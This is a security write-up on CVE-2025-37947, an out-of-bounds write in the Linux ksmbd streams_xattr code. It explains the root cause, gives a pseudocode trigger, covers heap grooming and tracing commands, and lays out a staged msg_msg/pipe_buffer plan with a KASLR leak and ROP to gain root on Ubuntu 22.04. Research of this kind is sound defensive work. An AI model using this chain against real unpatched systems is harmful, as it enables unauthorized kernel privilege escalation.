ksmbd streams_xattr OOB write β†’ local LPE (CVE-2025-37947)

{{#include ../../banners/hacktricks-training.md}}

This page documents a deterministic out-of-bounds write in ksmbd streams handling that enables a reliable Linux kernel privilege escalation on Ubuntu 22.04 LTS (5.15.0-153-generic), bypassing KASLR, SMEP, and SMAP using standard kernel heap primitives (msg_msg + pipe_buffer).

  • Affected component: fs/ksmbd/vfs.c β€” ksmbd_vfs_stream_write()
  • Primitive: page-overflow OOB write past a 0x10000-byte kvmalloc() buffer
  • Preconditions: ksmbd running with an authenticated, writable share using vfs streams_xattr

Example smb.conf

[share]
    path = /share
    vfs objects = streams_xattr
    writeable = yes

Root cause (allocation clamped, memcpy at unclamped offset)
- The function computes size = pos + count, clamps size to XATTR_SIZE_MAX (0x10000) when exceeded, and recomputes count = (pos + count) - 0x10000, but still performs memcpy(&stream_buf[pos], buf, count) into a 0x10000-byte buffer. If pos β‰₯ 0x10000 the destination pointer is already outside the allocation, producing an OOB write of count bytes.
- streams_xattr stores SMB alternate data streams inside POSIX extended attributes, so the 0x10000 ceiling comes from the Linux single-xattr size limit rather than from an SMB protocol field. That makes the bug practical only when the share explicitly enables vfs objects = streams_xattr and the filesystem supports xattrs.

Why the write offset matters
- The vulnerable path is not just "write more than 64KiB". The missing check was that *pos was not validated against the current stream length (v_len) before the append/copy logic ran.
- Upstream fixed this by rejecting writes where *pos >= v_len with -EINVAL. Pre-fix, an attacker could reuse a valid authenticated handle to a named stream and send a raw SMB2 WRITE whose file_offset already points at or past the end of the existing stream, which turns the post-clamp memcpy() into a deterministic page overflow.
- The public PoC demonstrates this by authenticating with libsmb2, opening a stream path such as 1337:, extracting SessionId/TreeId/FileId, and then sending a handcrafted SMB2 WRITE with file_offset = 0x10018 and a small Length.

Vulnerable function snippet (ksmbd_vfs_stream_write)
// https://elixir.bootlin.com/linux/v5.15/source/fs/ksmbd/vfs.c#L411
static int ksmbd_vfs_stream_write(struct ksmbd_file *fp, char *buf, loff_t *pos, size_t count)
{
    char *stream_buf = NULL, *wbuf;
    size_t size;
    ...
    size = *pos + count;
    if (size > XATTR_SIZE_MAX) {             // [1] clamp allocation, but...
        size = XATTR_SIZE_MAX;
        count = (*pos + count) - XATTR_SIZE_MAX; // [1.1] ...recompute count
    }
    wbuf = kvmalloc(size, GFP_KERNEL | __GFP_ZERO); // [2] alloc 0x10000
    stream_buf = wbuf;
    memcpy(&stream_buf[*pos], buf, count);         // [3] OOB when *pos >= 0x10000
    ...
    kvfree(stream_buf);
    return err;
}

Offset steering and OOB length
- Example: set file offset (pos) to 0x10018 and original length (count) to 8. After clamping, count' = (0x10018 + 8) - 0x10000 = 0x20, but memcpy writes 32 bytes starting at stream_buf[0x10018], i.e., 0x18 bytes beyond the 16-page allocation.

Triggering the bug via SMB streams write
- Use the same authenticated SMB connection to open a file on the share and issue a write to a named stream (streams_xattr). Set file_offset β‰₯ 0x10000 with a small length to generate a deterministic OOB write of controllable size.
- libsmb2 can be used to authenticate and craft such writes over SMB2/3.
- In practice, reusing the negotiated SMB session is convenient because the exploit only needs to patch a few dynamic fields in the WRITE request (TreeId, SessionId, FileId) and can then transmit the malformed packet directly on the same socket.

Minimal reachability (concept)

// Pseudocode: send SMB streams write with pos=0x0000010018ULL, len=8
smb2_session_login(...);
smb2_open("\\\\host\\share\\file:stream", ...);
smb2_pwrite(fd, payload, 8, 0x0000010018ULL); // yields 32-byte OOB

Allocator behavior and why page shaping is required
- kvmalloc(0x10000, GFP_KERNEL|__GFP_ZERO) requests an order-4 (16 contiguous pages) allocation from the buddy allocator when size > KMALLOC_MAX_CACHE_SIZE. This is not a SLUB cache object.
- memcpy occurs immediately after allocation; post-allocation spraying is ineffective. You must pre-groom physical memory so that a chosen target lies immediately after the allocated 16-page block.
- On Ubuntu, GFP_KERNEL often pulls from the Unmovable migrate type in zone Normal. Exhaust order-3 and order-4 freelists to force the allocator to split an order-5 block into an adjacent order-4 + order-3 pair, then park an order-3 slab (kmalloc-cg-4k) directly after the stream buffer.

Practical page shaping strategy
- Spray ~1000–2000 msg_msg objects of ~4096 bytes (fits kmalloc-cg-4k) to populate order-3 slabs.
- Receive some messages to punch holes and encourage adjacency.
- Trigger the ksmbd OOB repeatedly until the order-4 stream buffer lands immediately before a msg_msg slab. Use eBPF tracing to confirm addresses and alignment if available.

Useful observability

# Check per-order freelists and migrate types
sudo cat /proc/pagetypeinfo | sed -n '/Node 0, zone  Normal/,/Node/p'
# Example tracer (see reference repo) to log kvmalloc addresses/sizes
sudo ./bpf-tracer.sh

What to trace while tuning
- kvmalloc_node(0x10000) confirms when the vulnerable stream write actually consumes an order-4 allocation.
- load_msg/kretprobe:load_msg lets you estimate how many msg_msgseg allocations are attached to each sprayed message, which is useful when tuning primary/secondary message sizes for a specific kernel build.
- If the exploit is ported to a different distro/kernel, re-check cache names, inline msg_msg payload sizes, anon_pipe_buf_ops offsets, and gadget addresses rather than assuming the Ubuntu 22.04 LTS 5.15.0-153-generic constants still match.

Exploitation plan (msg_msg + pipe_buffer), adapted from CVE-2021-22555
1) Spray many System V msg_msg primary/secondary messages (4KiB-sized to fit kmalloc-cg-4k).
2) Trigger ksmbd OOB to corrupt a primary message’s next pointer so that two primaries share one secondary.
3) Detect the corrupted pair by tagging queues and scanning with msgrcv(MSG_COPY) to find mismatched tags.
4) Free the real secondary to create a UAF; reclaim it with controlled data via UNIX sockets (craft a fake msg_msg).
5) Leak kernel heap pointers by abusing m_ts over-read in copy_msg to obtain mlist.next/mlist.prev (SMAP bypass).
6) With an sk_buff spray, rebuild a consistent fake msg_msg with valid links and free it normally to stabilize state.
7) Reclaim the UAF with struct pipe_buffer objects; leak anon_pipe_buf_ops to compute kernel base (defeat KASLR).
8) Spray a fake pipe_buf_operations with release pointing to a stack pivot/ROP gadget; close pipes to execute and gain root.

Bypasses and notes
- KASLR: leak anon_pipe_buf_ops, compute base (kbase_addr) and gadget addresses.
- SMEP/SMAP: execute ROP in kernel context via pipe_buf_operations->release flow; avoid userspace derefs until after disable/prepare_kernel_cred/commit_creds chain.
- Hardened usercopy: not applicable to this page overflow primitive; corruption targets are non-usercopy fields.

Reliability
- High once adjacency is achieved; occasional misses or panics (<10%). Tuning spray/free counts improves stability. Overwriting two LSBs of a pointer to induce specific collisions was reported as effective (e.g., write 0x0000_0000_0000_0500 pattern into the overlap).

Key parameters to tune
- Number of msg_msg sprays and hole pattern
- OOB offset (pos) and resulting OOB length (count')
- Number of UNIX socket, sk_buff, and pipe_buffer sprays during each stage

Mitigations and reachability
- Fix: clamp both allocation and destination/length or bound memcpy against the allocated size; upstream patches track as CVE-2025-37947.
- Remote exploitation would additionally require a reliable infoleak and remote heap grooming; this write-up focuses on local LPE.

See also

{{#ref}}
../../network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.md
{{#endref}}

References PoC and tooling
- libsmb2 for SMB auth and streams writes
- eBPF tracer script to log kvmalloc addresses and histogram allocations (e.g., grep 4048 out-4096.txt)
- Minimal reachability PoC and full local exploit are publicly available (see References)

References

{{#include ../../banners/hacktricks-training.md}}